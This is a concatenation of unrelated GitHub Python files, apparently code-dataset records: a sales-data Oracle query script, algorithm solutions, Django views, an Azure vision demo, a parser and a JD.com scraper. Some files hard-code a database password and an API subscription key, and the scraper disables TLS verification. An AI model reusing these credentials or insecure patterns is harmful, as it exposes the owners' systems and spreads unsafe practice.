sales_data[\"Dc_code\"] = [data[\"SENDER\"].iloc[0]] * len(sales_data[\"Sku_id\"])\n sales_data[\"Munit\"] = [data[\"MUNIT\"].iloc[0]] * len(sales_data[\"Sales_qty\"])\n sales_data[\"Wrh\"] = [data[\"WRH\"].iloc[0]] * len(sales_data[\"Sales_qty\"])\n sales_data[\"Warehouse_name\"] = [data[\"WAREHOUSE_NAME\"].iloc[0]] * len(sales_data[\"Sales_qty\"])\n sales_data[\"Sku_name\"] = [data[\"SKU_NAME\"].iloc[0]] * len(sales_data[\"Sales_qty\"])\n sales_data = sales_data.sort_values( by = ['Account_date'], ascending = False)\n return sales_data\n\n#------------------------------------------------------------------>根据SKU 的id来获取每个SKU的具体的销售明细数据\ndef get_detail_sales_data(sku_id,start_date,end_date,DC_CODE):\n host = \"192.168.1.11\" # 数据库ip\n port = \"1521\" # 端口\n sid = \"hdapp\" # 数据库名称\n dsn = cx_Oracle.makedsn(host, port, sid)\n\n # hd40是数据用户名,xfsg0515pos是登录密码(默认用户名和密码)\n conn = cx_Oracle.connect(\"hd40\", \"xfsg0515pos\", dsn)\n # 查看出货详细单的数据\n stkout_detail_sql = \"\"\"SELECT b.SENDER,s1.NAME AS Dc_name,S.WRH,w.NAME AS \n warehouse_name,g.NAME AS sku_name,s.GDGID,b.NUM,s.RTOTAL,b.OCRDATE,\n s.CRTOTAL,s.MUNIT,s.QTY,s.QTYSTR,\n s.TOTAL,s.PRICE,s.QPC FROM STKOUTDTL s INNER JOIN(\n select *\n from STKOUT s\n INNER JOIN STORE s1 ON s.sender = s1.gid\n INNER JOIN STORE s2 ON s.CLIENT = s2.gid\n WHERE bitand(s1.property,32)=32 \n AND bitand(s2.property,32)<>32 \n AND substr(s2.AREA,2,3)<'8000' \n AND s.CLS='统配出')b ON s.NUM = b.NUM \n AND s.CLS='统配出' AND s.GDGID= %s\n and b.OCRDATE >= to_date('%s','yyyy-mm-dd') \n and b.OCRDATE <= to_date('%s','yyyy-mm-dd') \n and b.sender = %s\n INNER JOIN(SELECT * FROM goodsh G WHERE G.SORT<'8000' )g ON s.gdgid=g.gid\n INNER JOIN(SELECT * FROM WAREHOUSE w WHERE w.NAME LIKE'%%商品仓%%' )w ON w.GID = S.WRH\n INNER JOIN(SELECT * FROM STORE s1 )S1 ON S1.GID = b.SENDER \"\"\" % \\\n (sku_id,start_date,end_date,DC_CODE)\n stkout_detail = pd.read_sql(stkout_detail_sql, conn)\n conn.close\n return stkout_detail\n\n\n\n#------------------------------------------------------------------------->设置函数按照预测的数据,并完成画图\ndef get_real_data(forecast_data,start_date):\n\n DC_list = set(forecast_data['Dc_code'])\n end_date = forecast_data['Account_date'].max()\n print('读取的截止日期和开始日期是:%s,%s,日期格式是%s'%(start_date,end_date,type(end_date)))\n final_data = pd.DataFrame()\n for DC in tqdm(DC_list):\n DC_data = pd.DataFrame()\n forecast_data_mid = forecast_data[forecast_data['Dc_code'] == DC]\n sku_id_list = set(forecast_data_mid['Sku_id'])\n dc_name = forecast_data_mid['Dc_name'].iloc[0]\n for x in tqdm(sku_id_list):\n print('正在读取' + str(DC) + '的统计学指标,sku是'+str(x))\n detail_sales = get_detail_sales_data(x,start_date,end_date,DC)\n forecast_data_mid_sku = forecast_data_mid[forecast_data_mid['Sku_id'] == x ]\n sku_name = forecast_data_mid_sku['Sku_name'].iloc[0]\n print(detail_sales)\n if detail_sales.empty ==True:\n print('该资源为空')\n pass\n else:\n detail_sales = date_original_normalize(detail_sales)\n sales_group = data_group(detail_sales)\n sales_shop_data = sales_group.reset_index(drop=True, inplace=False)\n sales_shop_data = date_normalize(sales_shop_data)\n forecast_data_mid_sku = date_normalize(forecast_data_mid_sku)\n print('sales_shop_data',sales_shop_data)\n print('forecast_data_mid_sku', forecast_data_mid_sku)\n DC_data = pd.merge(sales_shop_data,forecast_data_mid_sku,\n on=['Account_date','Sku_id','Dc_name',\n 'Dc_code','Munit','Warehouse_name'\n ,'Sku_name','Wrh'],how='outer')\n\n # if os.path.exists('D:/jimmy-ye/AI_supply_chain/data/'\n # 'forecast_holiday/total_compare' + str(int(DC)) + str(dc_name) +\n # '_' + str(int(x)) + str(sku_name) + '.csv'):\n DC_data.to_csv('D:/jimmy-ye/AI_supply_chain/data/'\n 'forecast_holiday/total_compare' + str(int(DC)) + str(dc_name) +\n '_' + str(int(x)) + str(sku_name) + '.csv',encoding='utf_8_sig')\n\n mean_error = DC_data.fillna(method='ffill')\n # print('mean_error')\n # print(mean_error)\n DC_data = DC_data.append(mean_error)\n # else:\n # pass\n # print(DC_data)\n final_data = final_data.append(DC_data)\n return final_data\n\n\n\n\n\ndef main_function(old_path,start_date):\n data = read_forecast_data(old_path)\n final_data= get_real_data(data,start_date)\n print(final_data)\n final_data.to_csv('D:/jimmy-ye/AI_supply_chain/data/'\n 'forecast_holiday/total_compare.csv',\n encoding=\"utf_8_sig\")\n\n\n\n\nstart = '20180101'\n\n\nmain_function('D:/jimmy-ye/AI_supply_chain/data/forecast_holiday/final_holiday.csv',start)\n","repo_name":"jimmyeva/AI-predict","sub_path":"xianfengsg/forecaset/V1.2/error_count.py","file_name":"error_count.py","file_ext":"py","file_size_in_byte":10723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70093738989","text":"from collections import deque\n\ndef solution(n, computers):\n def BFS(k):\n nonlocal answer\n answer += 1\n Q = deque([k])\n while Q:\n nr = Q.popleft()\n\n for nc in range(0, n):\n\n if computers[nr][nc] and not v[nc]:\n v[nc] = 1\n Q.append(nc)\n\n v = [0] * n\n answer = 0\n\n for i in range(n):\n for j in range(n):\n if computers[i][j] and not v[j]:\n BFS(i)\n\n print(answer)\n return answer\n\n\nn = 3\ncomputers = [[1, 1, 0], [1, 1, 0], [0, 0, 1]]\n\nsolution(n,computers)","repo_name":"heogeon0/Algorithm","sub_path":"DFSBFS/프로그래머스_네트워크.py","file_name":"프로그래머스_네트워크.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33658878674","text":"from backgorund_image import backgroundImage\r\nfrom check_directory import add_path\r\ndef filter_background_image():\r\n type_filter = int(input('type_filter : '))\r\n background_filter =''\r\n color = ''\r\n type_of_background = input('enter type of background : [gray,image,blur,color] : ')\r\n\r\n path_input_image=add_path(input('image path : '),'Input_image/')\r\n\r\n if type_filter ==0 and type_of_background == 'image' :\r\n background_filter = add_path(input('path image : '), 'input_background/')\r\n backgroundImage(type_of_background, path_input_image,color, background_filter)\r\n\r\n\r\n if type_of_background=='color':\r\n add_color = input('input color rgb : 0,0,255 : ')\r\n color = tuple(map(int, add_color.split(',')))\r\n\r\n if type_filter == 1 :\r\n backgroundImage(type_of_background,path_input_image,color,'../assest/background/back1.png')\r\n if type_filter == 2 :\r\n backgroundImage(type_of_background,path_input_image,background_filter,color,'../assest/background/back2.png')\r\n\r\nfilter_background_image()","repo_name":"Python-Hiss/Filteristic","sub_path":"background_image/filter_background_image.py","file_name":"filter_background_image.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41427488391","text":"class Solution(object):\n def subtractProductAndSum(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n inpu = n\n prod = 1\n summed = 0\n while inpu != 0:\n digit = inpu % 10\n inpu = inpu / 10\n prod *= digit\n summed += digit\n return prod - summed","repo_name":"BhavyaShah99/leet-code-hackerrank-practice","sub_path":"sub-product-and-sum.py","file_name":"sub-product-and-sum.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22442590188","text":"from django.shortcuts import render\nfrom .models import Post, Contato\n\n# Create your views here.\n\ndef hello_blog(request):\n lista = [\n 'Django', 'Python', 'Git', 'Html',\n 'Banco de dados', 'Admin', 'Java', 'C++',\n 'C#'\n ]\n list_posts = Post.objects.all()\n\n data = {\n 'name': 'Django 3', \n 'lista_tecnologias': lista, \n 'posts': list_posts}\n \n \n return render(request, 'index.html', data)\n\ndef post_detail(request, id):\n post = Post.objects.get(id=id)\n return render(request, 'post_detail.html', {'post': post})\n\ndef save_form(request):\n name = request.POST['name']\n Contato.objects.create(\n name=name,\n email=request.POST['email'],\n message=request.POST['message']\n )\n return render(request, 'contato_sucesso.html', {'name_contato': name})","repo_name":"cadu77/Blog-2","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74503875626","text":"import requests\n# If you are using a Jupyter notebook, uncomment the following line.\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport json\nfrom PIL import Image\nfrom io import BytesIO\n\n# Replace with your valid subscription key.\nsubscription_key = \"397e1aeb8cb14c8a90d246bfa8d32cd2\"\nassert subscription_key\n\n# You must use the same region in your REST call as you used to get your\n# subscription keys. For example, if you got your subscription keys from\n# westus, replace \"westcentralus\" in the URI below with \"westus\".\n#\n# Free trial subscription keys are generated in the \"westus\" region.\n# If you use a free trial subscription key, you shouldn't need to change\n# this region.\nvision_base_url = \"https://westcentralus.api.cognitive.microsoft.com/vision/v2.0/\"\n\nanalyze_url = vision_base_url + \"analyze\"\n\n# Set image_url to the URL of an image that you want to analyze.\nimage_url = \"https://www.gannett-cdn.com/presto/2018/11/28/USAT/294aec28-e899-48e0-a50b-632fa588f58b-AP_AptOPIX_Trump.JPG?crop=1471,1269,x1623,y129&width=534&height=401&fit=bounds&auto=webp\"\n\nheaders = {'Ocp-Apim-Subscription-Key': subscription_key }\nparams = {'visualFeatures': 'Categories,Description,Color'}\ndata = {'url': image_url}\nresponse = requests.post(analyze_url, headers=headers, params=params, json=data)\nresponse.raise_for_status()\n\n# The 'analysis' object contains various fields that describe the image. The most\n# relevant caption for the image is obtained from the 'description' property.\nanalysis = response.json()\nprint(json.dumps(response.json()))\nimage_caption = analysis[\"description\"][\"captions\"][0][\"text\"].capitalize()\n\n# Display the image and overlay it with the caption.\nimage = Image.open(BytesIO(requests.get(image_url).content))\nplt.imshow(image)\nplt.axis(\"off\")\n_ = plt.title(image_caption, size=\"x-large\", y=-0.1)\nplt.show()\n","repo_name":"danny-ngo/awesomeface","sub_path":"azure.py","file_name":"azure.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11647617592","text":"import sys\nfrom code.logging.logger import Logger\nfrom code.parser.parameter import Parameter\nfrom code.parser.parameterlist import ParameterList\nfrom code.parser.parser import Parser\nfrom pyparsing import Regex, Forward, ZeroOrMore, Optional, ParseException\n\n\n \nclass Constructor(ParameterList, Parser):\n \"\"\"Class to parse constructor information.\n\n The parameter (return type, member function invocation, parameter list) \n will be parsed by this class.\n \n Inherits from:\n ParameterList: Storage of parameter information in list.\n Parser: Provides procedure parse()\n \n Variables:\n constructor: Fully qualified constructor invocation name.\n class_name: Class name of constructor.\n \"\"\" \n \n def __init__(self, argument):\n \"\"\"Constructor.\n \n Variables:\n argument: Data to be parsed.\n \"\"\"\n ParameterList.__init__(self)\n \n self.constructor = None\n self.class_name = None\n self.template_args = None\n\n self.parse(argument)\n \n \n def parse(self, argument):\n \"\"\"Procedure to parse constructor information.\n \n Variables:\n argument: Data to be parsed.\n \"\"\"\n # pyparsing syntax parser definition\n template = ZeroOrMore(' ') + Regex(r'<[a-zA-Z0-9\\,\\ ]+>') + \\\n ZeroOrMore(' ')\n classQualifier = Forward()\n classQualifierRegex = Regex(r'[a-zA-Z_0-9]+::')\n classQualifier << classQualifierRegex + ZeroOrMore(classQualifier)\n className = Regex(r'[a-zA-Z_0-9]+')\n classAll = (ZeroOrMore(classQualifier) + className + Optional( \\\n Regex(r'<[a-zA-Z0-9\\,\\ :]+>'))).setResultsName('constructor') \n\n anyString = ( Regex(r'(.*)') ) .setResultsName('parameters_text')\n constructor = Optional(template).setResultsName('template') + \\\n classAll + anyString\n \n #parse argument \n parse = None\n try:\n parse = constructor.parseString(argument, True )\n except ParseException as err:\n Logger().debug(err.line)\n Logger().debug(str(err))\n Logger().error('constructor parsing error \"%s\"' % argument)\n sys.exit(5)\n\n try:\n Logger().debug('entering conversion ...')\n \n #set constructor and class_name\n self.constructor = ''\n for item in parse['constructor']:\n self.constructor = self.constructor + item\n self.class_name = item\n\n Logger().debug('constructor %s' % self.constructor)\n \n #analyse parameter list \n Logger().debug('constructor parameter_list:')\n parameters_text = parse['parameters_text'][1:-1]\n\n #analyse parameter list - first step: include object parameter\n first_parameter = 'std::string ObjectId '\n if parameters_text:\n parameters_text = first_parameter + ', ' + parameters_text\n else:\n parameters_text = first_parameter\n\n # parse argument list \n if parameters_text: \n liste = parameters_text.split(',')\n Logger().debug(liste)\n pos = 0\n while pos=5.4\", \"requests==2.21.0\"]\n\n\nif __name__ == \"__main__\":\n setup(\n name=\"ip-lock\",\n version=__VERSION__,\n description=(\n \"A utility for keeping your dynamic public\"\n \" IP address up to date within your DNS provider.\"\n ),\n author=\"Chase Nicholl\",\n author_email=\"hello@chasenicholl.com\",\n url=\"https://github.com/chasenicholl/ip-lock\",\n packages=find_packages(),\n scripts=[\"bin/ip_lock\"],\n install_requires=INSTALL_REQUIRES,\n include_package_data=True,\n )\n","repo_name":"chasenicholl/ip-lock","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"22609883975","text":"import json\nimport numpy as np\n\n#Create empty dictionary\nQ = {}\n\n#Getting the vertical and horizontal states\nvertical_space = np.linspace(-400, 400, 200)\nhorizontal_space = np.linspace(0, 500, 50)\n\n\n#Fill in the dictionary for each state\nfor i in range(len(vertical_space)+1):\n\tfor j in range(len(horizontal_space)+1):\n\t\tfor action in range(2):\n\t\t\tQ[str(((i, j), action))] = 0\n\n\n'''for i in range(len(vertical_space)+1):\n\tfor action in range(2):\n\t\tQ[str((i, action))] = 0\n'''\n\n#Open the json file\nout_file = open(\"q_table.json\", \"w\") \n\n\n#Put the initial q-values in the file\njson.dump(Q, out_file)\n\n#Close the file\nout_file.close() ","repo_name":"erkinpolat/Reinforcement-Learning","sub_path":"flappy_bird/initialize_q_table.py","file_name":"initialize_q_table.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40619821264","text":"import sys\nimport json\n\nsys.path.insert(0, 'src/data')\nsys.path.insert(0, 'src/analysis')\nsys.path.insert(0, 'src/model')\nsys.path.insert(0, 'src/test')\n\nimport preact_resnet_orig, utils_orig\nimport train_fgsm, train_pgd_orig\n# from train_pgd_orig import train_pgd_attack\n\ndef main(targets):\n '''\n Runs the main project pipeline logic, given the targets.\n targets must contain: 'data', 'analysis', 'model'. \n \n `main` runs the targets in order of data=>analysis=>model.\n '''\n print(\"main\", targets)\n# if 'data' in targets:\n# with open('config/data-params.json') as fh:\n# data_cfg = json.load(fh)\n\n# # make the data target\n# data = get_data(**data_cfg)\n\n if 'analysis' in targets:\n with open('config/analysis-params.json') as fh:\n analysis_cfg = json.load(fh)\n\n # make the data target\n train_fgsm.main()\n\n# if 'model' in targets:\n# with open('config/model-params.json') as fh:\n# model_cfg = json.load(fh)\n\n# # make the data target\n# train(data, **model_cfg)\n \n if 'test' in targets:\n with open('config/test-params.json') as fh:\n model_cfg = json.load(fh)\n print('success')\n # make the data target\n train_pgd_orig.test_capabilities()\n print(\"done with PGD\")\n # write a successful output\n print(\"end of test\")\n# with open('test/testoutput/test_runresults.txt', 'w') as f:\n# f.write('test successful')\n return\n\n\nif __name__ == '__main__':\n # run via:\n # python main.py data model\n targets = sys.argv[1:]\n print(\"hello\")\n main(targets)\n","repo_name":"Maderlime/DSC180_Q1_Code","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8330820593","text":"import grafo\n\ndef popular_grafo(archivo):\n\twith open(archivo,'r+') as file:\n\t\t# saltear comentarios\n\t\tfor i in range(5):\n\t\t\tline = file.readline()\n\n\t\t# crear el grafo\n\t\tnuevoGrafo = grafo.Grafo()\n\t\t\n\t\t# popular el grafo\n\t\twhile line: \n\t\t\tpar = line.replace('\\n','').split('\\t')\n\t\t\tif not nuevoGrafo.vertice_pertenece(par[0]):\n\t\t\t\tnuevoGrafo.agregar_vertice(par[0])\n\t\t\tif not nuevoGrafo.vertice_pertenece(par[1]):\n\t\t\t\tnuevoGrafo.agregar_vertice(par[1])\n\t\t\tnuevoGrafo.agregar_arista(par[0],par[1])\n\t\t\tline = file.readline()\n\treturn nuevoGrafo\n\nif __name__ == \"__main__\":\n\tpopular_grafo()","repo_name":"lucas-veloso/algo-tp3","sub_path":"popgrafo.py","file_name":"popgrafo.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8587589255","text":"# Extract 500 sentences of depressed and non depressed subjects\n\nfrom json import dump, load\nfrom os import path\nfrom random import shuffle, seed\nfrom tqdm import tqdm\n\n# load precomputed json\nwith open(path.join('Data', 'data_json.json'), 'r') as json_file:\n\tdata = load(json_file)\n\n\ndataset = {\"depressed\": [], \"non depressed\": []}\nreview_len = []\n# for all the flags (\"depressed\" and \"non depressed\")\nfor flag, persons in data.items():\n\t# for all the subjects name\n\tfor per_id, history in tqdm(persons.items()):\n\t\t# for all the comments of a subject\n\t\tfor sent in history:\n\t\t\t# keep only the sentences with more than 5 words\n\t\t\tsplitted_sent = sent.split(' ')\n\t\t\tif len(splitted_sent) >= 5:\n\t\t\t\tdataset[flag].append(' '.join(splitted_sent[:5]))\n\nseed(30)\nshuffle(dataset[\"depressed\"])\nseed(30)\nshuffle(dataset[\"non depressed\"])\n\ndata_testing_gen = {\"depressed\": dataset[\"depressed\"][:500], \"non depressed\": dataset[\"non depressed\"][:500]}\n\n# save the sentences\nwith open(path.join('Data', 'data_testing_gen.json'), 'w') as json_file:\n\tdump(data_testing_gen, json_file)\n","repo_name":"GiacomoBerra/Master-Thesis-GPT2","sub_path":"sentence_extaction_testing.py","file_name":"sentence_extaction_testing.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70172140907","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nipFile = open(\"input.txt\", 'r')\ncontents = ipFile.read()\ncontents = contents.lower()\n\nalphabet = [chr(i+97) for i in range(26)]\nfrequencies = [0 for i in range(26)]\nchars = 0\n\nfor i in range(len(contents)):\n index = ord(contents[i]) - 97\n if index in range(0, 26):\n frequencies[index] += 1\n chars += 1\n\nfor i in range(26):\n frequencies[i] = round(frequencies[i]/chars*100, 2)\n\ny_pos = np.arange(len(alphabet))\nplt.bar(y_pos, frequencies, align='center', alpha=0.5)\nplt.xticks(y_pos, alphabet)\nplt.ylabel('Frequencies')\nplt.show()\n\n","repo_name":"D-setia/cryptoLectures","sub_path":"lec1/freqAnalysis/freqAnalysis.py","file_name":"freqAnalysis.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30909819733","text":"from django.db import models\n\nfrom aria.core.models import BaseModel\nfrom aria.discounts.managers import DiscountQuerySet\n\n_DiscountManager = models.Manager.from_queryset(DiscountQuerySet)\n\n\nclass Discount(BaseModel):\n \"\"\"\n Sets the discount level for one or more products. Product discounts can\n be limited for specific products or time periods.\n \"\"\"\n\n name = models.CharField(max_length=100)\n description = models.TextField(blank=True, null=True)\n slug = models.SlugField()\n\n products = models.ManyToManyField(\n \"products.Product\",\n verbose_name=\"products\",\n related_name=\"discounts\",\n blank=True,\n )\n product_options = models.ManyToManyField(\n \"products.ProductOption\",\n verbose_name=\"product options\",\n related_name=\"discounts\",\n blank=True,\n )\n\n minimum_quantity = models.PositiveIntegerField(\n blank=True,\n null=True,\n help_text=(\n \"The minimum product quantity for the discount to apply per orderline. \"\n \"E.g. take 3, pay for 2, the minimum quantity would be 3.\"\n ),\n )\n maximum_quantity = models.PositiveIntegerField(\n blank=True,\n null=True,\n help_text=(\n \"The maximum product quantity the discount applies to per orderline \"\n \"E.g. max amount of 10 items per customer.\"\n ),\n )\n\n discount_gross_price = models.DecimalField(\n blank=True,\n null=True,\n max_digits=10,\n decimal_places=2,\n help_text=\"Override the gross retail price of products if set.\",\n )\n discount_gross_percentage = models.DecimalField(\n blank=True,\n null=True,\n max_digits=10,\n decimal_places=2,\n help_text=(\n \"Override the gross price of the product by this percent. \"\n \"E.g. 0.25 for 25% discount.\"\n ),\n )\n\n maximum_sold_quantity = models.PositiveIntegerField(\n blank=True,\n null=True,\n help_text=(\n \"The maximum number of product discounts given before the discount \"\n \"is ended automatically.\"\n ),\n )\n total_sold_quantity = models.PositiveIntegerField(\n blank=True,\n null=True,\n help_text=\"The amount of products this discount has been applied to.\",\n )\n display_maximum_quantity = models.BooleanField(\n default=False,\n help_text=\"Display information telling customers about maximum quantity.\",\n )\n\n active_at = models.DateTimeField(\n \"Time when discount is active from\",\n blank=True,\n null=True,\n help_text=(\n \"When the discount should be active from. \"\n \"Leave empty to activate immediately.\"\n ),\n )\n active_to = models.DateTimeField(\n \"Time when discount is active to\",\n blank=True,\n null=True,\n help_text=(\n \"When the discount should end. \"\n \"Leave emtpy to apply discount indefinitely.\"\n ),\n )\n\n ordering = models.IntegerField(\n null=True,\n help_text=(\n \"Used to order product discounts. If unset, \"\n \"product discounts will be ordered by the time of creation.\"\n ),\n )\n\n objects = _DiscountManager()\n\n class Meta:\n verbose_name = \"Discount\"\n verbose_name_plural = \"Discounts\"\n\n def __str__(self) -> str:\n return self.name\n","repo_name":"danielkjellid/aria-api","sub_path":"aria/discounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72488839148","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QTableWidgetItem\nimport requests,re\nimport time\nimport threading\nfrom lxml import etree\nfrom pandas import DataFrame\nimport pandas as pd\nfrom Ui_jdjiadianui import Ui_MainWindow\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n\n self.itemurlDic = initsmallCatelog(self)\n\n self.comboBox.addItems([\"大家电\"])\n\n self.comboBox_2.addItems(self.itemurlDic.keys())\n \n self.pushButton.clicked.connect(self.onGetClicked)\n\n column_name = [\n '手机名称',\n '价格',\n '商家名称',\n '评论数'\n ]\n\n self.tableWidget.setColumnCount(len(column_name))\n\n self.tableWidget.setHorizontalHeaderLabels(column_name) # 设置列名称\n\n def insertItemData(self,itemData):\n\n itemCount = self.tableWidget.rowCount()\n self.tableWidget.insertRow(itemCount);\n for i in range(0, len(itemData)):\n self.tableWidget.setItem(itemCount,i,QTableWidgetItem(itemData[i])) \n\n\n def onGetClicked(self):\n print(\"开启spider\")\n base = \"https://list.jd.com\"\n\n #for key,value in self.itemurlDic.items():\n # print(key + \" : \" + base + value)\n\n # 在 initsmallCatelog中初始化 itemurlDic\n url = base + self.itemurlDic[self.comboBox_2.currentText()]\n\n self.update_data_thread = UpdateData(url) # 启动线程 ,传递 url参数\n self.update_data_thread.update_date.connect(self.insertItemData) # 链接信号,在线程中 emit信号,调用self.insertItemData\n self.update_data_thread.start()\n\n\ndef initsmallCatelog(self):\n url = \"https://list.jd.com/list.html?cat=737,794,13701\"\n res=requests.get(url, verify=False)\n res.encoding='utf-8'\n root=etree.HTML(res.text)\n\n names = root.xpath('/html/body//div[@class=\"crumbs-nav-item\"][last()]//ul[@class=\"menu-drop-list\"]/li/a/text()')\n urls = root.xpath('/html/body//div[@class=\"crumbs-nav-item\"][last()]//ul[@class=\"menu-drop-list\"]/li/a/@href')\n itemurldic = dict(zip(names,urls))\n return itemurldic\n\ndef getItemData(self):\n jdInfoAll = DataFrame()\n\n # 手机可以得到店铺 url=\"https://list.jd.com/list.html?cat=9987,653,655&page=\"+str(i)\n\n for i in range(1,4):\n url= self._url + \"&page=\"+str(i)\n print(\"url : \" + url )\n res=requests.get(url, verify=False)\n res.encoding='utf-8'\n root=etree.HTML(res.text)\n name=root.xpath('//li[@class=\"gl-item\"]//div[@class=\"p-name\"]/a/em/text()')\n\n for i in range(0,len(name)):\n name[i]=re.sub('\\s','',name[i])\n \n shopnames = ['//li[@class=\"gl-item\"]//div[@class=\"p-shop\"]//a/text()','//li[@class=\"gl-item\"]//div[@class=\"p-shop\"]/@data-shop_name']\n #商家名称\n for shopname in shopnames:\n shopname = root.xpath(shopname)\n if len(shopname) > 0 :\n break\n\n if len(shopname) == 0:\n print(\"无法获取 商家名称\") #商家信息动态加载的, 设置成 “”\n\n #sku\n sku=root.xpath('//li[@class=\"gl-item\"]/div/@data-sku')\n\n #价格\n price=[]\n comment=[]\n for i in range(0,len(sku)):\n thissku=sku[i]\n priceurl=\"https://p.3.cn/prices/mgets?callback=jQuery6775278&skuids=J_\"+str(thissku)\n pricedata=requests.get(priceurl, verify=False)\n pricepat='\"p\":\"(.*?)\"}'\n thisprice=re.compile(pricepat).findall(pricedata.text) \n price=price+thisprice\n\n commenturl = \"https://club.jd.com/comment/productCommentSummaries.action?my=pinglun&referenceIds=\"+str(thissku)\n commentdata = requests.get(commenturl)\n commentpat = '\"CommentCount\":(.*?),\"'\n thiscomment = re.compile(commentpat).findall(commentdata.text)\n comment = comment + thiscomment\n\n #self.tableWidget.insertRow(i)\n\n #self.tableWidget.setItem( i , 0 , QTableWidgetItem('Hello'))\n\n self.update_date.emit([name[i],thisprice[0],\"xxx\",thiscomment[0]]) # 发射信号\n #self.update_date.emit([name,price,comment]) # 发射信号\n #self.tableWidget.setItem( i , 0 , new QTableWidgetItem(name))\n #self.tableWidget.setItem( i , 1 , new QTableWidgetItem(price))\n #self.tableWidget.setItem( i , 2 , new QTableWidgetItem(comment))\n #self.tableWidget.\n\n\n # jdInfo = DataFrame([name,price,shopname,comment]).T\n # jdInfo.columns=['产品名称','价格','商家名称','评论数']\n #jdInfoAll = pd.concat([jdInfoAll,jdInfo]) \n\nclass UpdateData(QtCore.QThread):\n \"\"\"更新数据类\"\"\"\n\n update_date = pyqtSignal(list) # pyqt5 支持python3的str,没有Qstring\n\n def __init__(self, url):\n super().__init__()\n self._url = url\n\n def run(self):\n #print(self.parent().urls)\n pass # pass 无意义\n getItemData(self)\n\n \"\"\"\n cnt = 0\n count = 10\n while cnt < count:\n cnt += 1\n self.update_date.emit(str(cnt)) # 发射信号\n time.sleep(0.5)\n print(cnt)\n \"\"\"\n\n \n","repo_name":"zhaokh/jdpachong","sub_path":"jdspider_workwindow.py","file_name":"jdspider_workwindow.py","file_ext":"py","file_size_in_byte":5530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35576014846","text":"import numpy as np\n\nimport models\nimport graphics as graph\n\n\ndef task1_3_solve(Tc, Ts, channels_num):\n channels_number_range = np.arange(1, channels_num + 1, 1)\n\n model = models.ModelUnlimitedQueue(client_t=Tc, handling_t=Ts, channels=1)\n plots = graph.ModelPlots(name=\"Model with limited queue\")\n\n min_channels = 0\n\n for channels in channels_number_range:\n model.channels = channels\n if model.is_a_coef_valid():\n min_channels = channels\n break\n\n if min_channels == 0:\n raise ValueError(\"'a' coefficient is more than 1 for '{}' channels\".format(channels_num))\n\n print(\"Number of channels with 'a' coefficient less than 1: \", min_channels)\n\n channels_number_range_trim = channels_number_range[min_channels - 1:]\n\n busy_coefs = []\n queue_length_expects = []\n\n for channels in channels_number_range:\n model.channels = channels\n busy_coefs.append(model.busy_coefficient())\n queue_length_expects.append(model.queue_length_expect())\n\n plots.show_feature_dep_chan(x_axis=channels_number_range, data=busy_coefs, label=\"Busy channels coefficient\")\n plots.show_feature_dep_chan(x_axis=channels_number_range, data=queue_length_expects,\n label=\"Math expect of queue length\")\n\n channels_busy = []\n busy_coefs = []\n queue_probs = []\n queue_length_expects = []\n\n for channels in channels_number_range_trim:\n model.channels = channels\n channels_busy.append(model.busy_operators())\n busy_coefs.append(model.busy_coefficient())\n queue_probs.append(model.queue_prob())\n queue_length_expects.append(model.queue_length_expect())\n\n plots.show_feature_dep_chan(x_axis=channels_number_range_trim, data=channels_busy, label=\"Math expect of busy operators\")\n plots.show_feature_dep_chan(x_axis=channels_number_range_trim, data=busy_coefs, label=\"Busy channels coefficient\")\n plots.show_feature_dep_chan(x_axis=channels_number_range_trim, data=queue_probs, label=\"Probability of queue existence\")\n plots.show_feature_dep_chan(x_axis=channels_number_range_trim, data=queue_length_expects, label=\"Math expect of queue length\")\n","repo_name":"Aruko21/RC6-AnModImModSys","sub_path":"solvers/task1_3.py","file_name":"task1_3.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"996842347","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport numpy as np\nfrom matplotlib.mlab import 